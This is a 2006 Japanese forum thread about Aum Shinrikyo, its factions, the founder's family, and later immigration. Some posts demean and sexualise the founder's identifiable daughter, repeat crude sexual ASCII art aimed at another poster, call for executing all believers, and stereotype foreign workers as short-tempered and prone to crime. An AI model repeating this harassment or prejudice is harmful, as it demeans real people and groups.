なんで人より贅沢してみせないと気がすまないんだよ?え??

339 :和井 恵:2006/08/24(木) 13:56:28 ID:tid3vBbu
>>321
>真理の道に戻る気があるならまだ見込みはあるがな。

君の言う「迷妄の道」になど、二度と戻るつもりはない。

340 :名無しさん@3周年:2006/08/24(木) 13:56:41 ID:ctawRnn9
>>335
心配には及ばない。ただ二人相手に質問がいくつもあるから
さすがに大変だよ。
直に会って直接言葉で話したほうが早いよ。
だが私が乱れることはない。それは大丈夫だ。

341 :名無しさん@3周年:2006/08/24(木) 13:57:48 ID:4heaV/z1
>>336

だからね、それがあるからこそ我々は変化していって解脱できるって点について聞いてるのw
意味なんか無いのは分ってるってw
でも、それこそが我々を変化させるならこれもまた真理ってのはどうよ?って聞いてるのw

342 :名無しさん@3周年:2006/08/24(木) 14:00:31 ID:qY4Yheop
漏れは、現役だったころ呼んだ教団の本に
(人里はなれた山に分け入り、木の根を食すものだけが救われる)と
書いてあったんで
教団にメールしたんだよ
知子とガキドモは木の根っこ食えって、!
そうしたら、かわりに高級マンション買った、って噂が流れてきて、、

何がお受験だよなあ?
漏れは他人が勉強するのの邪魔なんかしないが
教祖の家族が人並みになりたがるのは許せないんだよね、、
この世に終わりが来るって、脅して出家させたり、
信者の財布カラにしたくせによ!

343 :名無しさん@3周年:2006/08/24(木) 14:00:46 ID:4heaV/z1
>>340

・・・口調まで二ノ宮だ・・

344 :名無しさん@3周年:2006/08/24(木) 14:01:33 ID:ctawRnn9
変化自体は真理ではない。
変化によりとんでもない方向へ落ちていったらどうする?
そもそもヨーガの成就もなしに解脱はない。

345 :名無しさん@3周年:2006/08/24(木) 14:03:48 ID:qY4Yheop
実子らは、年端もいかぬ子供だったから、罪にはならない
それを利用して、ガキドモの名前でせいぜい買い物しているのさ
知子が買うとヒンシュクだから、、

346 :名無しさん@3周年:2006/08/24(木) 14:04:22 ID:4heaV/z1
>>344

その変化をコントロールして解脱に持っていくのがヨーガや修行なのでしょうがw

ほう?
面白いこと言うね。
ヨーガの成就と解脱は別もの?
ではヨーガの成就とはなに?
あなたの言う解脱とは?

347 :名無しさん@3周年:2006/08/24(木) 14:05:10 ID:ctawRnn9
まだ話を続けても良いのだが
用事が入ったので失礼する。
またキミ達とは話をしたいものだ。

348 :名無しさん@3周年:2006/08/24(木) 14:06:51 ID:4heaV/z1
>>347

うん。
悟ったつもりの迷妄のお方。
またここで会いましょう。


349 :白龍:2006/08/24(木) 14:09:55 ID:MMe3eGCG
>>347
>>312の質問にも次回は答えてくださいね。

350 :名無しさん@3周年:2006/08/24(木) 14:11:12 ID:4heaV/z1
さて・・・あり得ないことだとしても・・二ノ宮だと思うが・・・

彼を知ってる方はどう思う?


351 :名無しさん@3周年:2006/08/24(木) 14:15:16 ID:qY4Yheop
白龍さんは、2ちゃんに成就者がきたらいいと、
よく思っているらしいからな、、
思い込みじゃないのかね?

352 :名無しさん@3周年:2006/08/24(木) 14:17:23 ID:4heaV/z1
いやあ。
あの感じがね・・・どうにも彷彿とさせる・・・

353 :白龍:2006/08/24(木) 14:17:52 ID:MMe3eGCG
>>350
雰囲気ありますねえ。
お付の人に打ち込ませてるのかな。

354 :和井 恵:2006/08/24(木) 14:18:57 ID:tid3vBbu
>333
>ナーギタはクンダリニーについてどう考えてるんだ?
>そこを少し教えてくれないか?

私は、「クンダリニー」あるいは「霊性」というものは、
「解脱・悟り」というよりも、むしろ「神通力の獲得」の方と
深く関わっているモノだと思っています。

そして、「道(方法)」としては、落とし穴が多く、
途中で顕れる「色々な体験」に囚われてしまう危険性が高い。
それらの囚われを潰していってくれる「指導者」がいるならば、
まぁ、問題ないと思いますよ。

355 :白龍:2006/08/24(木) 14:19:14 ID:MMe3eGCG
>>351
そうかもね。(笑)


356 :名無しさん@3周年:2006/08/24(木) 14:21:37 ID:qY4Yheop
マンションにお住まいになって、私立大にお通いのご実子がいる
グルの弟子に、
学校教育を否定される筋合いはございませんよ
いくらでも金出してやるくせに
漏れはそれで、すっかりこの教団が(昔から嫌いだったけど)
大嫌いになったよ
結局、奴隷にされたのさ!


357 :名無しさん@3周年:2006/08/24(木) 14:26:30 ID:qY4Yheop
世俗の煩悩を追っかけるのはやめろ、って散々シュジュウさせられて
ガキドモが学歴とマンションに金使い込むのをみるのさ!!
人を右往左往させないでくれたまえ

だったら、私がきたときになんで、あれはだめだこれはだめだいいやがった?



358 :名無しさん@3周年:2006/08/24(木) 14:27:37 ID:qY4Yheop
日本人の4人に一人が死ぬんだろ
目の前でバタバタ死ぬんだろ
どうして大学いくんだよ マンション買うんだよ
バカじゃないのか?

359 :和井 恵:2006/08/24(木) 14:28:26 ID:tid3vBbu
>>333
>それから偽者真理君もね。

「偽」というのは、ちょっと可哀想な気も…

私たちは、修行していく過程で、色々な体験をします。
その中で出てくる「心の顕れ(慢)」に囚われると、
「自分を特別な存在だ!」と思い込んでしまうのです。
そして、ある意味、私たちは「自己の存在意義」を
絶えず求めて続けていますから、誰でもある時期、
そのような「意識状態」を必ず経験するのです。

特に、「無明」の一つ手前の「慢」が顕れてきたときは
かなり大変な想いをしなければ成りません。

そしてそれが、「一過性」で済むのなら、
あまり問題はありませんが、「囚われ続けている」と、
大きなトラブルになってしまうでしょうね…

360 :名無しさん@3周年:2006/08/24(木) 14:29:16 ID:qY4Yheop
くたばりやがれ

361 :和井 恵:2006/08/24(木) 14:37:56 ID:tid3vBbu
>>359

おっとゴメン。
「偽真理君」だったのか^^;
「偽真理勝者」と間違えて読んでしまったww

従って、このコメントは、勘違いのコメントでした。


362 :和井 恵:2006/08/24(木) 14:42:34 ID:tid3vBbu
つまり、359は、教祖についてのコメントです。
私は彼を「真理勝者」だなどとは思っておりません。

363 :名無しさん@3周年:2006/08/24(木) 14:46:56 ID:4heaV/z1
>>362

びっくりしたw
「慢」だと言われてるのかと思ったw

364 :和井 恵:2006/08/24(木) 14:50:59 ID:tid3vBbu
ごめんね。間違えて^^

365 :和井 恵:2006/08/24(木) 14:55:16 ID:tid3vBbu
でも、「救世主(ヒーロー)願望」って
誰もが持っているよね、心の奥底で。

それが、強烈なエネルギーを伴って「顕在化」してくる「時期」があるの。
これを乗り越えるのは、結構大変だと思うよ。

366 :名無しさん@3周年:2006/08/24(木) 15:00:59 ID:4heaV/z1
>>365

それは理解できます。
俺もそれが多少でてた時期もあった。
また出て来るんだろうけど気をつけてます^^

367 :名無しさん@3周年:2006/08/24(木) 15:03:36 ID:qY4Yheop
憎たらしい あんな過激に学校教育を否定した教祖の実子が
なんでチャラチャラ、
人より金かけて教育を受けるんだ!答えやがれ、、
漏れはさんざんメールしたが、返事はこない!

かわりに教団のしわざかはしらねど
気が付いたらスパイウイルスだらけ、、

368 :和井 恵:2006/08/24(木) 15:04:04 ID:tid3vBbu
私たちは、誰もが「自己の人生」の「主人公(ヒーロー)」。
決して「脇役」などではない。

「自己を根本とし、自己を島として」
この言葉を、忘れないようにね…

369 :名無しさん@3周年:2006/08/24(木) 15:05:56 ID:qY4Yheop
金取りたいときだけ、ドカドカ呼びもしないのにやってきて
都合の悪いことは黙秘さね

まあ、人殺すような集団ですから、ナニ期待しても無駄よね
期待するだけ時間の無駄
わかっているはずなんだけど、わかってないんだよな
もっと、誠意のある返答というのを期待してしまう自分がいる


370 :名無しさん@3周年:2006/08/24(木) 15:07:58 ID:aLaDb99G
ななな

371 :名無しさん@3周年:2006/08/24(木) 15:09:16 ID:qY4Yheop
事件前、教団に好意的な発言をしてくれたどっかの大学教授の家に
(その教授があたかもよその団体から命を狙われているかのように、みせかけるため)
爆発物しかけたんだぜ

自分たちに見方してくれた人にも、平気でそんなことするんだもの
協力してやった信者だって、教団のためなら平気で殺すんだよな

372 :名無しさん@3周年:2006/08/24(木) 15:13:41 ID:aLaDb99G
yu

373 :和井 恵:2006/08/24(木) 15:14:42 ID:tid3vBbu
>>366
>また出て来るんだろうけど気をつけてます^^

それを乗り越えるために、最も必要なのが「平等心」。
四無量心の中の、四番目の心。
オウムでは「無頓着」と訳してしまっているけどね…
「自と他を区別しない心」の働きから、
「全宇宙でたった一つの特別な魂」なんて考え方が、
生まれてくると思うかい?


374 :名無しさん@3周年:2006/08/24(木) 15:20:37 ID:7tKNYgrx
 今日のキャンディ

ID:qY4Yheop

375 :名無しさん@3周年:2006/08/24(木) 15:21:21 ID:fkkyy0tO
てか信者全員死刑で良くない?

376 :名無しさん@3周年:2006/08/24(木) 15:21:47 ID:7tKNYgrx
オバサンまだ生きてたの?

                   /   ノノ ノノノ ヾヽ、ヽ
               /   ノj `      ´ i | 漏れ キャンディ
               i    {   ` , ,-,、´  i | ア、アア、アアアアーーーイクーー
              {    i     )-―-'(  i |    
                 ヽ   i     ⌒   } |_,,,. -‐- 、  
              __)), ,ノ人   、_,  ノ''"´   ,      \ 
                /       ` ー--,. '´   . : :`(      ゝ、
               /           : : :: :´: .         : :\ , ' ´_   ヽ
           /  r´: :       : : : :       ,. ' ´ ヽ>'´    ,'ヽ!
             / γ: :        ノ    _   ,, 、,, ,,__i  。 ./       ; ,!
           i   ir' " ヽ    ,,, ''' ´         `"7         :/ 
         i  |、 ° }, '                 ` y'         /
   "'''‐‐- ...,,,_|   ヽ、ー/           __    _/          /
             `'''-,,,て          ´    ̄ ̄ /          ,イ 
             `''-、__/            /    `  / ,!    _,
                     `''-,,_     ,..、_,,..イ´      i'´  `ゝ''"´
                    \_ ,,,,,...ゞ、_           |ー-/  
                           ミ〉       !r'´
                         ヽ   ミ/、 /|  i  i } 


377 :名無しさん@3周年:2006/08/24(木) 15:53:11 ID:k4JQTrJv
↓オウム事件の元凶

http://www.google.co.jp/search?sourceid=navclient-menuext&ie=UTF-8&q=%E5%9F%8E%E5%86%85%E5%BA%B7%E5%85%89

378 :20:2006/08/24(木) 16:03:30 ID:G8TACm6P
>>白龍さん
信徒の方々にしてもM派立ち上げ時に活躍されていた何名かを最近見掛けないような気がします。
そして成就者だと、DVDにも出演され、勉強会でも司会をされていた男性の師が全員、M派活動から離れたようですよ。

ステージ制度の廃止をしたいのなら、代表自ら最初に捨てたらよい。
今は成就者方の都合の良いようにステージ制度がゆるめられて、平気で外食もするようになってしまった。
代表が一番外食が多いらしいがw
それは改革なのかと思う。

結局、教団改革という名の下に誕生したM派だけど、意見が上手くまとまらなくて
M派自身を改革しないといけなくなっていると感じる。
でもそれにしても活動人数が少なすぎだと。

379 :名無しさん@3周年:2006/08/24(木) 16:43:19 ID:VqiKw/Ld
 
阿羅漢に到達したものが数多く下向した説明と
それよりステージの高い大乗のヨーガを成就した者が
かつてのグルを間違ったと否定した理由を示してくれ。
 

380 :阿左谷北:2006/08/24(木) 17:04:49 ID:RqLqeZTC
>>367
俺にメールくれれば、よいのに。
100%の返信率だよ(笑)

381 :名無しさん@3周年:2006/08/24(木) 17:23:15 ID:qY4Yheop
>今は成就者方の都合の良いようにステージ制度がゆるめられて、平気で外食もするようになってしまった。
代表が一番外食が多いらしいがw

なんだそれ
漏れは金がかかるという理由からだが、マックで100円のチーズバーガー食う以外は
ほとんど外食せんぞ
まあ、戒が守りたいからでなく、金がないというだけだがな


382 :名無しさん@3周年:2006/08/24(木) 17:25:01 ID:qY4Yheop
ナニ食うんだよ外食って?


383 :名無しさん@3周年:2006/08/24(木) 17:50:11 ID:VqiKw/Ld
 
日テレで巡礼ツアーやってる。


384 :名無しさん@3周年:2006/08/24(木) 18:04:22 ID:VeO15pyW
>>367
> かわりに教団のしわざかはしらねど
> 気が付いたらスパイウイルスだらけ、、

ほとんどが、Tracking Cookieじゃない?

スパイウェア駆除ソフトを回す前に、ブラウザーのクッキーを掃除してからじゃないと
スパイウェアだらけって大騒ぎする事になるよ。
Tracking cookieは、あまり心配することない。

385 :名無しさん@3周年:2006/08/24(木) 18:11:38 ID:VqiKw/Ld
 
太陽まんじゅうってなぬ?

386 :名無しさん@3周年:2006/08/24(木) 18:45:27 ID:VqiKw/Ld
 
 
どんな理論を展開しようとも、美辞麗句を並べようとも
現在の教祖の現状が全てを物語っているとおもう。
 


387 :2ちゃんねらー:2006/08/24(木) 19:05:57 ID:eem2Uo6G
今日は前編で、明日後編を放送するといっていました。

388 :名無しさん@3周年:2006/08/24(木) 19:33:48 ID:7tKNYgrx
オバサンまだ生きてたの?

                   /   ノノ ノノノ ヾヽ、ヽ
               /   ノj `      ´ i | 漏れ キャンディ
               i    {   ` , ,-,、´  i | ア、アア、アアアアーーーイクーー
              {    i     )-―-'(  i |    
                 ヽ   i     ⌒   } |_,,,. -‐- 、  
              __)), ,ノ人   、_,  ノ''"´   ,      \ 
                /       ` ー--,. '´   . : :`(      ゝ、
               /           : : :: :´: .         : :\ , ' ´_   ヽ
           /  r´: :       : : : :       ,. ' ´ ヽ>'´    ,'ヽ!
             / γ: :        ノ    _   ,, 、,, ,,__i  。 ./       ; ,!
           i   ir' " ヽ    ,,, ''' ´         `"7         :/ 
         i  |、 ° }, '                 ` y'         /
   "'''‐‐- ...,,,_|   ヽ、ー/           __    _/          /
             `'''-,,,て          ´    ̄ ̄ /          ,イ 
             `''-、__/            /    `  / ,!    _,
                     `''-,,_     ,..、_,,..イ´      i'´  `ゝ''"´
                    \_ ,,,,,...ゞ、_           |ー-/  
                           ミ〉       !r'´
                         ヽ   ミ/、 /|  i  i } 


389 :名無しさん@3周年:2006/08/24(木) 19:43:26 ID:HMXGySb6
>>367
はい、アーチャリー様が私立大学へ進まれるのは

学問の自由(日本国憲法第23条)
教育を受ける権利(日本国憲法第26条)に基づくもの。

教団がグルを崇拝するのは

思想・良心の自由(日本国憲法第19条)
信教の自由(日本国憲法第20条)に基づくもの。

違法でも何でもございません。

390 :名無しさん@3周年:2006/08/24(木) 19:55:13 ID:HMXGySb6
日本国憲法第23条
「学問の自由は、これを保障する。」

日本国憲法第26条<国民の教育を受ける権利>
「すべて国民は、法律の定めるところにより、その能力に応じて、
ひとしく教育を受ける権利を有する。」

※大学行く能力のある者は大学行って良し。

教育基本法第3条<教育の機会均等>
「すべて国民は、ひとしく、その能力に応ずる教育を受ける機会を
与えられなければならないものであつて、人種、信条、性別、社会的身分、
経済的地位又は門地によつて、教育上差別されない。」

※オウムだからといって教育が受けられないという権利はないのです。



391 :阿左谷北:2006/08/24(木) 20:00:53 ID:RqLqeZTC
大学行ったって、就職無理でしょ?
相当わがままだし。

どうせ、信者の布施食いつぶして、終わりじゃないかいな?

392 :名無しさん@3周年:2006/08/24(木) 20:08:10 ID:HMXGySb6
日本国憲法第19条<思想及び良心の自由>
 「思想及び良心の自由は、これを侵してはならない。」
日本国憲法第20条<信教の自由>
  「信教の自由は、何人に対してもこれを保障する。」

※大日本帝国憲法では条件付きの自由ですが、日本国憲法では
無条件でこれを認めています。オウムであろうが、何を信じようがまったく構わないのです。
人にとやかく言われる筋合いはないのです。

393 :和井 恵:2006/08/24(木) 20:13:48 ID:tid3vBbu
>人にとやかく言われる筋合いはないのです。

じやあ、何で君たちは「他の人」の思想や生活に対して
「とやかく言って」相手を「自分たちの思い込みの世界」に
引きづり込もうとしているのさ?
相手の迷惑も考えずに…

394 :阿左谷北:2006/08/24(木) 20:15:27 ID:RqLqeZTC
観念崩壊セミナーで見せた
アーチャリーの尊大な態度ときたら(笑)
だから、テレビに映る、澄ました態度をみると、嘘臭いんだな。
芝居だよ、芝居。

395 :阿左谷北:2006/08/24(木) 20:19:23 ID:RqLqeZTC
アーチャリーは、躾の段階でおかしいから、
生涯だめだと思う。

女は躾が一生を決めるからな。

396 :和井 恵:2006/08/24(木) 20:21:13 ID:tid3vBbu
>観念崩壊セミナーで見せた
>アーチャリーの尊大な態度ときたら(笑)

それって、何年くらい前の話なの?


397 :阿左谷北:2006/08/24(木) 20:24:24 ID:RqLqeZTC
アーチャリーが大学で学ぶのは勝手だが、
悪知恵を増長させないように、教授にはお願いしたい。

398 :阿左谷北:2006/08/24(木) 20:28:20 ID:RqLqeZTC
>>396
10年くらい前ですか。
12、3歳だったと思います。

女子プロになった方がいい。
ぶりっ子すんじゃねーよ。

399 :和井 恵:2006/08/24(木) 20:32:29 ID:tid3vBbu
>>354
>それらの囚われを潰していってくれる「指導者」がいるならば、
>まぁ、問題ないと思いますよ。

オウムの教祖は、この指導者としては
「失格」だったと考えています。
「潰す」どころか、その囚われを「より強くする」ような
指導しかしていないからね…

400 :阿左谷北:2006/08/24(木) 20:34:07 ID:RqLqeZTC
オウムの悪い所に、人の才能を見抜き、伸ばせないことが一つある。
アーチャリーは、あの傲慢さ、声の大きさ、男まさりの体格といい
格闘向きなのである。
大学行かせること自体、才能の芽を摘んでいる。

401 :和井 恵:2006/08/24(木) 20:37:31 ID:tid3vBbu
>>398
>12、3歳だったと思います。

ふーん、微妙な年頃だね…

402 :阿左谷北:2006/08/24(木) 20:43:10 ID:RqLqeZTC
俺がアーチャリーを直に見てオモタのは
「いい体格だな」と「足が速いな」だね。褒めるとしたら。

403 :阿左谷北:2006/08/24(木) 20:53:35 ID:RqLqeZTC
所詮チヅオの遺伝子引き継いでるんだし
頭使ったって、ろくなことしないさ(笑)
身体使えばいいんだよ。リングの中では、悪さも無問題だし(笑)

404 :名無しさん@3周年:2006/08/24(木) 20:57:06 ID:69wHXtOo
ひとりだけエビフライ食っていた結果の立派な体格なんだろ?

尊大って、どういう態度かなあ、、
現世で尊大って女はまず嫌われるけど
和田あきこみたいのかね

405 :名無しさん@3周年:2006/08/24(木) 21:01:43 ID:69wHXtOo
自分が一番でないと気がすまないとか
まずでしゃばるとか、、自分よりでしゃばっているのがいると
蹴り倒したくなるとか
そういうのか?


406 :阿左谷北:2006/08/24(木) 21:05:19 ID:RqLqeZTC
尊大というのは、俺が思うに回りが加勢していたのもあると思う。
和田アキ子とは違うなあ。
詳しい事情は、やめたM師やT・D師に聞きたいくらいですよ(笑)

407 :和井 恵:2006/08/24(木) 21:10:01 ID:tid3vBbu
>>252
>たとえば、語学に秀でている人ってのは
>一種の神通を持っていると私は思うのね
>語学のできない日本人は外人怖がるんだけど、
>話せれば友達になるしね
>世界中の人と意思の疎通ができるのと、
>同じ言語だけでしか理解しあえないってのは
>広がりが違うと思っていた

私たちは、「言葉」を使って思考することが多い。
だから、その言語の持つ「特徴」に支配されているよね。

よく言われるのは、日本人は「Yes.No」がはっきりしない。
それに対して、アメリカ人は明確な自己主張をする。

これらは、「結論」を最後に持ってくる言語構成(文法)を
普段使っているのか、それとも、
最初から「提示する」習慣のある言葉を使っているのかが
大きな違いとなって顕れていると思う。

「表現の仕方」も面白いよね。
「ゴメンね、君の役に立てなくて」と言うのを、
「私は今、縛られている」という表現をしたりする。
色々な国の言葉を使える人は、思考能力もアップしていると思うよ。

408 :名無しさん@3周年:2006/08/24(木) 21:54:13 ID:69wHXtOo
もどきに、アチャリって渡る世間は鬼ばかり、見ているのかなあと
聞くと
お前と同じ生活しているよ、っていうの

そんで、(エっ!渡る世間は鬼ばかり、見るの?)って
言うと
だから、お前と同じ生活しているって、言うのよ

409 :和井 恵:2006/08/24(木) 21:59:09 ID:tid3vBbu
>これらは、「結論」を最後に持ってくる言語構成(文法)を
>普段使っているのか、それとも、
>最初から「提示する」習慣のある言葉を使っているのかが
>大きな違いとなって顕れていると思う。

勿論、これらの社会的背景には、
「和」を尊しとする「濃厚民族的な村社会」と、
「異なった人種、民族が同居する混合型社会」との違いもある。
前者は、他の人と「異なった意見」を言うと、「叩かれる」社会だから、
最後の「結論」も言葉を濁して「曖昧にする習慣」がある。
後者は、「自己の主張」を明確に持っていないと、「一人前」として扱われない、
あるいは「自立して生きていけない」社会でもある。

但し、どちらがいいかは「一長一短」があって、その評価は難しい。

だから、「世界の共通語」なんてものを普及させるより、
色々な国の言葉を(つまりは異なった思考形態を)学習すると言うことは、
とても有意義なことだと思いますよ。


410 :和井 恵:2006/08/24(木) 22:01:21 ID:tid3vBbu
>濃厚民族的な

農耕民族、ね^^

411 :名無しさん@3周年:2006/08/24(木) 22:01:41 ID:Eoo7walc
『とんねるずのみなさんのおかげでした』じゃねーのかよ

412 :名無しさん@3周年:2006/08/24(木) 22:02:57 ID:69wHXtOo
アチャリと、知子とゲイカとかで
コタツに入りながら、みかんの皮むいて食べていたら、、と想像する
渡る世間は鬼ばかりをみながら

413 :ア-テャリ:2006/08/24(木) 22:08:03 ID:p1PmeXMP
今、「花嫁は厄年ッ!」見てるっ
http://www.tbs.co.jp/hana-yaku/

414 :名無しさん@3周年:2006/08/24(木) 22:16:53 ID:69wHXtOo
409そうですね
日本人は、あまりはっきり言わない
白人ははっきり言わないと自分の意見がない、とみなされるというけど
どうなんだろうね

実は、2ちゃん見てたりしてな アチャリ
ネット見てる、っていってたもんね


415 :名無しさん@3周年:2006/08/24(木) 22:20:11 ID:U1tMcgDP
 
今日の日テレでM派の人間が北チョウセンと一緒だったと言っていた。
拉致して、監禁して、毒ガスまで…
 
 
そのとおりだと思った。
誰か絶対的な幸福に到達した者が一人でもいるのだろうか?


416 :名無しさん@3周年:2006/08/24(木) 22:22:07 ID:69wHXtOo
北とナチスを足して、仏教で割ってみてください

417 :名無しさん@3周年:2006/08/24(木) 22:41:48 ID:HMXGySb6
すばらしい集団オウム

http://www.youtube.com/watch?v=hXubXUNKLhE

418 :名無しさん@3周年:2006/08/24(木) 23:00:06 ID:69wHXtOo
アチャリサマは部活などされるのかね?

419 :名無しさん@3周年:2006/08/24(木) 23:06:26 ID:69wHXtOo
もどきがアチャリは占いが好きってんだけど、、

420 :阿左谷北:2006/08/24(木) 23:09:57 ID:RqLqeZTC
アーチャリーの大学に入学したら?(笑)

421 :名無しさん@3周年:2006/08/24(木) 23:19:53 ID:7tKNYgrx
オバサンまだ生きてたの?

                   /   ノノ ノノノ ヾヽ、ヽ
               /   ノj `      ´ i | 漏れ キャンディ
               i    {   ` , ,-,、´  i | ア、アア、アアアアーーーイクーー
              {    i     )-―-'(  i |    
                 ヽ   i     ⌒   } |_,,,. -‐- 、  
              __)), ,ノ人   、_,  ノ''"´   ,      \ 
                /       ` ー--,. '´   . : :`(      ゝ、
               /           : : :: :´: .         : :\ , ' ´_   ヽ
           /  r´: :       : : : :       ,. ' ´ ヽ>'´    ,'ヽ!
             / γ: :        ノ    _   ,, 、,, ,,__i  。 ./       ; ,!
           i   ir' " ヽ    ,,, ''' ´         `"7         :/ 
         i  |、 ° }, '                 ` y'         /
   "'''‐‐- ...,,,_|   ヽ、ー/           __    _/          /
             `'''-,,,て          ´    ̄ ̄ /          ,イ 
             `''-、__/            /    `  / ,!    _,
                     `''-,,_     ,..、_,,..イ´      i'´  `ゝ''"´
                    \_ ,,,,,...ゞ、_           |ー-/  
                           ミ〉       !r'´
                         ヽ   ミ/、 /|  i  i 

422 :阿左谷北:2006/08/24(木) 23:24:28 ID:RqLqeZTC
お前、工作員だろ?
m9(^Д^)プギャー!!

423 :和井 恵:2006/08/24(木) 23:24:33 ID:tid3vBbu
>>414
>日本人は、あまりはっきり言わない
>白人ははっきり言わないと自分の意見がない、とみなされるというけど
>どうなんだろうね

今後の予想として、一つ言えることは、
将来日本は、「少子化」及び「高齢化社会」などの問題もあり、
「不足する人材」を補うために、より「他国の人々」に
依存する(共生してゆく)社会になっていくだろう、ということ。

つまり、アメリカのような「多民族が混在する社会」へと
移行(変貌)していくだろう、と考えられるのです。

この時、私たちの「考え方(思考方法)」をTPOに合わせたものにしていかなければ、
様々な「トラブル(誤解や勘違いから生じる人間関係の軋轢)」が多発するでしょうね…
もしその時に、「他国(多国)の言語」を自在に使いこなせる人が沢山いれば、
それらを未然に防ぐ「潤滑剤」として活躍することが出来るのではないでしょうか。

424 :名無しさん@3周年:2006/08/24(木) 23:34:46 ID:txAFV0C6
>ID:ctawRnn9

ってさあ、釣りだったんだろう

あそこまでの人いるんかいなあ

もし本当だったら自滅していく筈だわ、MもAも


425 :名無しさん@3周年:2006/08/24(木) 23:38:05 ID:69wHXtOo
まじで外人の子供を受け入れたいんだってね
その前にオウムの子でもどうかしらと

相撲みると複雑だわ 外人ばっかり

426 :和井 恵:2006/08/24(木) 23:48:13 ID:tid3vBbu
>相撲みると複雑だわ 外人ばっかり

だから、その反動として「国粋的な意識」も高まっていく危険性がある。
これに、「労働問題(仕事を取られて失業する日本人が増える)」が絡んだとき、
トラブルが多発し、治安が悪化してゆく流れも出てきそうな気がするね…

427 :名無しさん@3周年:2006/08/25(金) 00:00:19 ID:furgHkG3 ?2BP(0)
>だから、その反動として「国粋的な意識」も高まっていく危険性がある。
>これに、「労働問題(仕事を取られて失業する日本人が増える)」が絡んだとき、
>トラブルが多発し、治安が悪化してゆく流れも出てきそうな気がするね…

これ、今までも実際に起こっていることだと思いますね。
問題を大きくしているのが、「日本に出稼ぎに来なければならない」
というような背景を持っている外国人が出稼ぎに来ている、という事実。
例外はあるものの、富裕層や貴族階級の人間が来る必要もなし、
おそらく来る気にもならないと思う。
ということは、来ている人の大半が貧困層など、
必ずしも身分や地位が高いとはいえない人たちだと思います。

こういう階級の人は日本、外国を問わず、
これまた例外は多々あるものの、比較的短気で喧嘩っ早いという
傾向があります。
トラブルの多発、治安悪化に至る下地は十分だといえるでしょう。
日本人サイドの「国粋意識」「アジア人への偏見と差別」、
そして「労働問題」が絡まったとき、
確実に和井さんの予想する方に転がっていくでしょうね。

428 :和井 恵:2006/08/25(金) 00:02:22 ID:p+H6TabT
だから、本当はこういう時にこそ、
「自と他の区別(差別・相手の個性を尊重しない)」から
「解放された人たち」が大勢現れて、社会的に活躍していく必要がある。
それも、「宗教活動」などではなくて、現世的な活動を、ね。

世界で最も悲惨な戦争は、「宗教戦争」と「民族戦争」だと言われている。

429 :名無しさん@3周年:2006/08/25(金) 00:10:28 ID:gvNyYcDc
冥王星を惑星としないとすることが決まった。
これは占星学的に大きな影響があるかね?

430 :名無しさん@3周年:2006/08/25(金) 00:14:01 ID:9Q74Yfnr
ATMごとショベルカーで金を盗まれたって聞いたときは
なんか、外人って考えることが違うなあと思った

日本人って、堂々と悪いことする人があまりいなかったような気がするんだけど
白昼堂々とか、やるんだもの

431 :和井 恵:2006/08/25(金) 00:15:34 ID:p+H6TabT
>冥王星を惑星としないとすることが決まった。
>これは占星学的に大きな影響があるかね?

何の影響も無いと思いますよ。
それは、「人間達の勝手な分類法(解釈)」の問題にしか過ぎませんから…
「冥王星」が消えてしまったのなら、何らかの影響はあるかもしれませんけどね。




432 :名無しさん@3周年:2006/08/25(金) 00:15:46 ID:RMiDnVIS
上祐「信教の自由があります。」
坂本「人を不幸にする自由はありません!!」

オウム信者は坂本事件を反省してますか?


433 :和井 恵:2006/08/25(金) 00:22:00 ID:p+H6TabT
>日本人って、堂々と悪いことする人が
>あまりいなかったような気がするんだけど

日本文化は「恥」の分化でもあるから、
何にしても「堂々とする」ことはあまり無いでしょ?

ただ、日本人も「海外ツアー」などへ行くと、
「旅(一時的な滞在場所)の恥はかき捨て」で、変貌するよね。

434 :名無しさん@3周年:2006/08/25(金) 00:38:11 ID:3IDczeSK
信教の自由はあるだろうけど、賠償の義務があって、本来はそんなマンション買っていい状況に
ないはず

435 :白龍:2006/08/25(金) 00:48:09 ID:2NKNZP0q
>>378
ただいま帰還しました。返信遅れてすみませんでした。

>信徒の方々にしてもM派立ち上げ時に活躍されていた何名かを最近見掛けないような気がします。
>そして成就者だと、DVDにも出演され、勉強会でも司会をされていた男性の師が全員、M派活動から離れたようですよ。
そうなんですか。何で離れたのか、離れた人に理由を聞いてみたいですね。

>ステージ制度の廃止をしたいのなら、代表自ら最初に捨てたらよい。
大賛成。
というか、上祐さん自身は、そんなに頓着していないと思いますよ。
周りがうるさいんじゃないですか。

>今は成就者方の都合の良いようにステージ制度がゆるめられて、
>平気で外食もするようになってしまった。
M派は自由な雰囲気の中にある分、戒律の遵守が、自己責任となり、
非常に守りにくい状態になっているのかもしれませんね。
人間どうしても、自分には甘くなりがちですから。

>結局、教団改革という名の下に誕生したM派だけど、意見が上手くまとまらなくて
>M派自身を改革しないといけなくなっていると感じる。
過渡期を割り引いても、もう少ししっかりしないと、
M派自体も危うくなってしまいますね。

>でもそれにしても活動人数が少なすぎだと。
これは、全くその通り。

20さんは、非常に私と観点が似てるんですが、
A派の方なのですか?中間派なのですか?

436 :和井 恵:2006/08/25(金) 00:51:07 ID:p+H6TabT
>「旅(一時的な滞在場所)の恥はかき捨て」

つまり、そういう「犯罪行為」をあまり増大させずに
抑止できるかどうかの一つのポイントは、

日本に訪れる、様々な理由を持つ外国の人たちが、

「自分は此処に住むことが出来て(定住することが許されていて)、
真面目に働くことが(正当な差別のない評価と報酬を得ることが)出来る」

という「社会環境」を創れるかどうか、ということ。

これが出来なければ、「外国マフィア(裏社会)と絡んだ犯罪」や、
自分たちの「存在できるエリアを確保しようとする動き(民族活動)」が
「日本の国内」のあちこちで、活発になって行くだろうね…

437 :名無しさん@3周年:2006/08/25(金) 02:55:37 ID:1Eqj41gA
キャンディさんへ
アーチャリに惚れてしまいました。
笛の音に痺れてしまいました。
あの女欲しい。

出世払いは必ずする。どうすりゃいい?

438 :阿左谷北:2006/08/25(金) 03:12:26 ID:2tKUSVyR
チヅオの娘だ。やめとけ。

439 :名無しさん@3周年:2006/08/25(金) 04:13:35 ID:1Eqj41gA
チズオの娘は、私に軽くひねられて、モルモットにされてしまったよ。


440 :阿左谷北:2006/08/25(金) 04:33:42 ID:2tKUSVyR
あなたのペットになったのか?
それなら、すでにものにしてるじゃん。

441 :名無しさん@3周年:2006/08/25(金) 06:01:38 ID:8E402FsJ
外国人が日本で働きたがるのは、
日本の賃金が高いから。
後進国から見ると日本人はすごく金持ちに見える。
実際には物価が高いから、たいして金持ちではないが…。
日本で働いて、本国に送金すると、ものすごい金額になる。
フィリピンでは月給が1万円ぐらいらしい。

ただ円が高いのは日本人の優秀性を示すことになる。
それだけ高い円でも輸出ができるのだから。

